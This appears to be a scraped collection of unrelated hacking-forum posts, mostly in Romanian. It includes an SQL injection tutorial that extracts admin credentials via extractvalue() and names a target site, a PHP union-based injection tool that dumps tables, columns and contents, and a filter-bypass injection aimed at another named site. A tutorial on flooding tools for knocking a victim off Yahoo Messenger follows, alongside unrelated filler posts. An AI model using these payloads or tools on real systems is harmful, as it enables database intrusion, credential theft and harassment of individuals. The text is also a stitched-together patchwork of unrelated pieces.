Leaderboard

Introduction. In this tutorial i will be teaching you SQL injection using the xml function extractvalue() to extract data from mySQL versions 5.1 and above. This tutorial assumes that you have an understanding of the structure of mySQL and the basic functions and operators needed for SQL injection so i wont be covering them. Advantages of this injection type - No need for union. - Can find version(), user(), database() without using select. - Good error based injection to use when getting the error "The used select statements have a diffrent number of columns" with union. - More clearer than the generic Double Query. Disavantages - extractvalue() isnt supported on mySQL versions below 5.1 The tutorial. Grabbing the targets mySQL server data So you have found a website and have confirmed that an SQL injection exist by adding a single quote after the parameter and receiving a mySQL error, now we can extract the version, user, database etc by using this injection: www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))-- Result: 'Xpath syntax error: 5.5.9:user@localhost' So we have received the version() and user() by error message so we know its vulnerable so we will move on to gaining the admins login details. Finding the database tables www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))-- Result: 'Xpath syntax error: <address' So now we have the first table in the database 'address' by using LIMIT to skip all the information_schema tables. Now we need to go through the tables using 'limit' untill we find a table named admin, user, tbl_admin, users or similar www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))-- Result: 'Xpath syntax error: :users' So we have found a table named 'users' which will most likely hold the columns which contain the usernames and passwords. Now we move onto finding the column names. protip: Start at limit 75,1 to skip the database schema tables. Finding the database columns So now that we have selected the table we want we now need to find the columns containing the login data, look for username, password, user, pass or similar. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))-- Result: 'Xpath syntax error: :username' So on the 1051st column we found the column named 'username', now we need to look for the column containing the password. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))-- Result: 'Xpath syntax error: :password' So on the 1151st column in the database we found the column named 'password'. Now we move onto the final step. Protip: Start at limit 970,1 to skip all the Database schema columns. Extracting data - the final step All we do now is join the columns together from the users table like so. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))-- Result: 'Xpath syntax error: :Admin:password1' Whoila! you now have the admin login details in username:password format. You can find a good example of when to use this injection here: http://www.sientries.co.uk/event.php?event_id=460 Hope you like this tutorial, please take time to leave your feedback. Credits: --Error 403 - forbidden-- @ HF

Va pun la dispozitie un pachet de Share Hosting GRATUIT! O Singura regula! *Fara prosti pe host,cum veti fi prinsi veti avea direct DELETE! Este fara nici un ads aces host pentru informati sau alte detalii Ym: client.arena FREE WEB HOSTING 2 GB Disk space 2000 MB Bandwidth 10000 MB FTP Accounts 5 Email Accounts 15 Email Lists 15 Mysql Databases 7 Sub Domains 5 Parked Domains 3 Addon Domains 3 etc Inregistreazate Acum pentru a intra in posesia pachetului.

<?php //author:www.vul.kr error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $server=$argv[1]; $mode=$argv[2]; $database=$argv[3]; $server=str_replace("\"","",$server); $num=0; if(!$server||!$mode){ print_r(' --------------------------Begin Code By www.vul.kr------------------------------ Usage: php.exe '.$argv[0].' Url Options Database Table Options: 1 Show Union Number [MYSQL 4/5 VERSION] 2 Show Tables [MYSQL 5 VERSION] 3 Show Columns [MYSQL 5 VERSION] 4 Show Content [MYSQL 4/5 VERSION] 5 Guess Tables [MYSQL 4 VERSION] 6 Guess Columns [MYSQL 4 VERSION] -------------------------------End----------------------------------------- '); exit; } function str_todex($string){ $num=strlen($string); for($i=0;$i<$num;$i++){ $str=substr($string,$i,$i+1); $ascii=ord($str); $hex.=dechex($ascii); } $hex="0x".$hex; return $hex; } if($mode==1) { $injstr="0x5B676F6F676C656F72675D"; $ins=$injstr; for($j=1;$j<=50;$j++){ $expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23"; echo ".."; $reponse=@file_get_contents($expurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Colnums Numbers: $j \r\n";break;} $injstr=$ins.",".$injstr; } $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=1;$k<=$j;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $expurl="%23"; $rurl=$unum.$expurl; $fp=fopen("url.txt","w"); fwrite($fp,$rurl); //echo "\r\n$rurl"; echo "\r\n go and see url.txt"; } elseif($mode==2){ if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;} //-----------------------------get the NO of tables------------------------------------------------------------ $expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurl0; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23"; $rurl=$unum.$expurl1; $search=$argv[5]+500; $endurl=str_replace($search,$replacetext,$rurl); //--------------------------------------------------------------------------------------------- $reponse1=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1); if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";} for($i=0;$i<$Tnum;$i++){ echo "\r\n"; //-----------------------------Get tables----------------------------------------------------------- $expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurfirst; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23"; $rurl=$unum.$expurl; $endurl=str_replace($search,$replacetxt,$rurl); //------------------------------------------------------------------------------------------------ $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "Done!\r\n";break;} }} elseif($mode==3){ $table=$argv[6]; if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;} //--------------------------------get count colnums------------------------------------------------------------ $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl2="%09FrOm%09information_schema.COLUMNS"; $expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23"; $rurl=$unum.$expurl2; $search=$argv[5]+500; $endurl=str_replace($search,$replacetx,$rurl); //--------------------------------------------------------------------------------------------- $reponse2=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2); if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";} for($i=0;$i<$Cnum;$i++){ //--------------------------------Get Colnums------------------------------------------------------------ $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09information_schema.COLUMNS"; $expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23"; $rurl=$unum.$expurl; $search=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); //--------------------------------------------------------------------------------------------- $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "Down!\r\n";break;} } } //--------------------------MYSQL4.0 Guess table--------------------------------------- elseif($mode==5) { if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;} $tmptalble=array( 'users','user','admin','ident','adminlog','members','member','eq_users', 'tb_users','tbl_user','login','logging','nuke_users','admins','group_members', 'phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin', 'auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin', 'WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins', 'manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins', 'cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member', 'tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login', 'sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user', 'nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users', 'jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins', 'cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users'); $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[3]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replay="0x5B676F6F676C656F72675D"; $expurl="%09FrOm%09[chinapost]%23"; $rurl=$unum.$expurl; $search=$argv[4]+500; $endurl=str_replace($search,$replay,$rurl); $endurl2=$endurl; //--------------------------------------------------------------------------------------------- for($j=0;$j<count($tmptalble);$j++){ $tb=$tmptalble[$j]; $endurl=str_replace("[chinapost]",$tb,$endurl); $reponse=@file_get_contents($endurl); if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];} $endurl=$endurl2;}} //--------------------------MYSQL4.0 Guess Colnums--------------------------------------- elseif($mode==6) { if($argc<>7) {echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;} $tmpcol=array( 'id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd', 'login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass', 'usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy', 'Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin', 'user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw', 'pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth', 'adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass', 'admin_name','account','accounts','sb_admin_name','sb_pwd'); $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[3]+500; $Gtable=$argv[6]; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replay="0x5B676F6F676C656F72675D"; $expurl="%09FrOm%09".$Gtable."%23"; $rurl=$unum.$expurl; $search=$argv[4]+500; $SeLeCtsearch=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); $endurl2=$endurl; //--------------------------------------------------------------------------------------------- for($j=0;$j<count($tmpcol);$j++){ $tb=$tmpcol[$j]; $endurl=str_replace($SeLeCtsearch,$tb,$endurl); $reponse=@file_get_contents($endurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Column: ".$tmpcol[$j];} $endurl=$endurl2;}} elseif($mode==4){ $table=$argv[6]; $column=$argv[7]; $column2=$argv[8]; if($argc<>9) {echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;} //--------------------------------Get contents count------------------------------------------------------------- $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl2="%09FrOm%09$database.$table%23"; $rurl=$unum.$expurl2; $search=$argv[5]+500; $endurl=str_replace($search,$replacetx,$rurl); //--------------------------------------------------------------------------------------------- $reponse2=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2); if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";} for($i=0;$i<$Cnum;$i++){ //--------------------------------Get contents------------------------------------------------------------ $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23"; $rurl=$unum.$expurl; $search=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); //--------------------------------------------------------------------------------------------- $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "done!\r\n";break;} } } ?> http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt

Ai vazut vreun episod din serialul Lie to me? Daca da, probabil ai ramas putin mirat de modul in care personajul principal reuseste sa “citeasca” oamenii si scoate la iveala si cea mai bine ascunsa minciuna. Ideea filmului pleaca de la premisa ca subconstientul nostru actioneaza autonom fata de actul verbal, influentand modul in care corpul se comporta atunci cand spunem o minciuna. Reactiile sunt inconstiente si destul de greu de controlat, mai ales daca persoana nu are experienta in spusul minciunilor. Exista insa si oameni care sunt adevarati asi in modelarea propriului corp, astfel incat acesta sa actioneze in conformitate cu cuvintele rostite. Exista insa cateva elemente de baza pe care le poti folosi in avantajul tau. LINIA DE BAZA Inainte sa te apuci sa detectezi semnalele, stabileste o linie de baza, sau cum s-ar spune in limbajul de specialitate “calibreaza” persoana respectiva, pentru ca nu toata lumea actioneaza in mod similar si s-ar putea sa fii indus in eroare. Daca nu cunosti foarte bine persoana cu care porti dialogul, pune initial intrebari banale, cum i se pare vremea afara sau ce a mancat la pranz. Vezi cum se comporta in situatii uzuale si abia apoi treci la intrebari mai delicate. Daca atunci cand ajungi la acestea, individul se comporta diferit, atunci poti incepe sa fii atent la semnalele corpului si a modului in care isi expune raspunsul. PRIVIREA In mod uzual, exista parerea conform careia persoanele care mint nu isi pot privi in ochi interlocutorul, sau evita cat mai mult contactul vizual direct. Poate fi si acesta un punct de pornire, insa sunt persoane care cunosc acest fapt si atunci, din conta, pastreaza contactul prea mult timp, fix. Daca ti se pare ca persoana pastreaza un contact prea intens, uita chiar sa si clipeasca, atunci exista posibilitatea sa te minta. In al doilea rand, fii atent la directia in care persoana isi arunca privirea atunci cand ii pui o intrebare. Momentul dureaza numai o secunda si este facut inconstient. Daca persoana isi arunca privirea in partea stanga atunci aceasta spune adevarul, iar daca isi arunca privirea in partea dreapta atunci isi imagineaza raspunsul, sau te minte. Acest fapt este legat de faptul ca emisfera stanga a creierul este cea care retine faptele, memoreaza, in timp ce emisfera dreapta este cea care se ocupa cu imaginatia. Astfel daca se uita in partea stanga, incearca sa isi aduca aminte ceva, sa extraga din memorie iar daca se uita in partea dreapta incearca sa isi imagineze, sa formeze pe loc un raspuns. Dar fii atent, nu toate persoanele actioneaza la fel! De accea este important mai intai sa stabilesti linia de baza. MISCAREA MAINILOR In al doilea rand fii atent la miscarea mainilor si a picioarelor. Cei care mint, au tendinta de a face ceva cu mainile, de a le tine ocupate (joaca cu parul, cu un cercel, cu un inel). In acelasi mod, au tendinta de a-si misca constant picioarele, de a le pozitiona mereu diferit. Asta pentru ca in interior devine agitat si trebuie sa isi foloseasca corpul pentru a nu se da de gol. Daca corpul sau nu transmite nimic, fii atunci atent la modul in care isi expune povestirea. DETALII IN EXCES Daca acesta minte, are tendinta de a da mai multe detalii decat i-ai cerut, de a povesti chiar daca tu nu intrebi in mod direct anumite fapte. Este o modalitate prin care el incearca cu toata forta sa te convinga de ceea ce spune. REACTIA LA INTREBARE Vezi cum reactioneaza atunci cand ii pui o intrebare. Daca persoana nu are nimic de ascuns, iti va raspunde sincer si linistit. In caz contrat, se poate sa actioneze chiar violent verbal, va trece pe pozitia de atac, spunandu-ti ca ai ceva cu el, ca il acuzi pe nedrept, ca pui prea multe intrebari sau ca esti indiscret. Asta pentru ca se simt inconfortabil cu intrebarea ta si incearca sa faca orice pentru a iesi din situatie, aruncand vina in ograda ta. FORMULAREA RASPUNSULUI Fii atent si la modul in care isi formuleaza raspunsul. S-ar putea sa iti spuna adevarul, sa actioneze linistit, dar de fapt nu va face altceva decat sa deraieze intrebarea (de exemplu: sotul isi intreaba sotia daca l-a inselat vreodata. Aceasta ii poate raspunde linistita: “dar eu te iubesc si vreau sa stau cu tine toata viata”. Este o modalitate diplomata de a nu raspunde la intrebare si chiar de a impaca cealalta persoana in mod constient). Sau va incerca sa schimbe cat mai rapid subiectul, parand foarte interesat de orice altceva decat ceea ce il intrebi tu. Toate aceste fapte depind insa de fiecare persoana in parte, de contextul general in care se desfasoara discutia si de relatia intre cele doua persoane. Este mai bine sa cauti mai multe informatii daca tu crezi ca persoana respectiva te minte, decat sa o etichetezi in mod direct. Si cel mai important, persoana poate reactiona in modul descris mai sus, doar daca este constienta ca minte. ___ Cititi si reply-urile din topicul asta. Sursa de unde am copiat tutorialul aici.

Cu placere "magnificule" , ma bucur ca am putut fi de ajutor:)

Acesta este un exemplu despre cum se poate evita filtru aplicat de server împotriva SQLi. Cererea este blocat? de c?tre filtru: http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 2) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- zoom Cererea trece de filtru ?i este executata de MySQL: http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- zoom ########################## Site-ul dat ca exemplu numai este vulnerabil. Credite: tdxev Sursa: aici.

How to be a Programmer: A Short, Comprehensive, and Personal Summary Robert L Read Table of Contents 1. Introduction 2. Beginner Personal Skills Learn to Debug How to Debug by Splitting the Problem Space How to Remove an Error How to Debug Using a Log How to Understand Performance Problems How to Fix Performance Problems How to Optimize Loops How to Deal with I/O Expense How to Manage Memory How to Deal with Intermittent Bugs How to Learn Design Skills How to Conduct Experiments Team Skills Why Estimation is Important How to Estimate Programming Time How to Find Out Information How to Utilize People as Information Sources How to Document Wisely How to Work with Poor Code How to Use Source Code Control How to Unit Test Take Breaks when Stumped How to Recognize When to Go Home How to Deal with Difficult People 3. Intermediate Personal Skills How to Stay Motivated How to be Widely Trusted How to Tradeoff Time vs. Space How to Stress Test How to Balance Brevity and Abstraction How to Learn New Skills Learn to Type How to Do Integration Testing Communication Languages Heavy Tools How to analyze data Team Skills How to Manage Development Time How to Manage Third-Party Software Risks How to Manage Consultants How to Communicate the Right Amount How to Disagree Honestly and Get Away with It Judgement How to Tradeoff Quality Against Development Time How to Manage Software System Dependence How to Decide if Software is Too Immature How to Make a Buy vs. Build Decision How to Grow Professionally How to Evaluate Interviewees How to Know When to Apply Fancy Computer Science How to Talk to Non-Engineers 4. Advanced Technological Judgment How to Tell the Hard From the Impossible How to Utilize Embedded Languages Choosing Languages Compromising Wisely How to Fight Schedule Pressure How to Understand the User How to Get a Promotion Serving Your Team How to Develop Talent How to Choose What to Work On How to Get the Most From Your Teammates How to Divide Problems Up How to Handle Boring Tasks How to Gather Support for a Project How to Grow a System How to Communicate Well How to Tell People Things They Don't Want to Hear How to Deal with Managerial Myths How to Deal with Organizational Chaos Glossary A. B. History (As Of February, 2003) C. GNU Free Documentation License PREAMBLE APPLICABILITY AND DEFINITIONS VERBATIM COPYING COPYING IN QUANTITY MODIFICATIONS COMBINING DOCUMENTS COLLECTIONS OF DOCUMENTS AGGREGATION WITH INDEPENDENT WORKS TRANSLATION TERMINATION FUTURE REVISIONS OF THIS LICENSE ADDENDUM: How to use this License for your documents Legatura: http://samizdat.mines.edu/howto/HowToBeAProgrammer.html

Am 30 invitatii filelist.....probabil ca ar trebui sa le vand.... , dar nu cred ca o sa ma imbogatesc . Hai sariti cu adresele de mail !!!! Primul venit primul servit

[+] Am vazut ca majoritatea userilor noi care apar pe forum cauta asta si am vazut ca mai este un topic in care toti scriu si nu le raspunde nimeni la intrebari si mai mult de atat buti nu sunt buni ceea ce ii face pe ei sa creada ca programul nu e bun. O sa fac eu sa zicem "tutorialul" acesta pentru userii care nu stiu ce au de facut. [+] Pentru inceput avem nevoie de o arhiva cu cateva "floodere" (sunt cele pe care le folosesc si eu ) Arhiva contine 3 foldere : - Flooderi - IR IDMakerV3.2 - Multi Yahoo Boots Checker La Flooderi sunt programele , La IR IDMaker V3.2 este un program cu care puteati realiza buti foarte usor ,si la Multi Yahoo Boots Checker se afla un program cu care puteti scana lista voastra de buti si sa salvati buti care mai merg si sa scapati de cei care numai merg. [+] Intrati la Flooderi si deschideti pe rand doar : -Big Killer Release -Fusion Ym v2 -GMC Booters Restul de 2 le lasati acolo pentru ca nu merg si mi-a fost lene sa le sterg..^^ La toate cele 3 programe o sa vedeti ca va apare Load la fiecare dintre ele. Dati la Load pe rand la fiecare si selectati fisierul .txt din folderul Flooderi numit dEv1L Boots buni. Faceti la fel la toate si dupaia dati la toate log in. Asteptati putin sa se incarce toate . O sa ia ceva timp sa se incarce..Nu mult.Cam 45 de secunde . Dupa ce s-au incarcat buti bagati idiul acolo la Victim si dati in felul urmator. La Big Killer Release dati Flood ,la Fusion Ym dati Fast YM Flood iar la Gmc booters dati Boot 1. Acum victima va fi scoasa de pe mess.Nu dureaza foarte mult ..depinde de viteza netului. [+]Cam asta e tot ca sa flodati pe cineva. [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. [+] Daca "tutorialul" meu v-a fost de ajutor apasati pe butonul REP de sub avatarul meu. Sper ca am fost de folos noilor membri care cautau asta.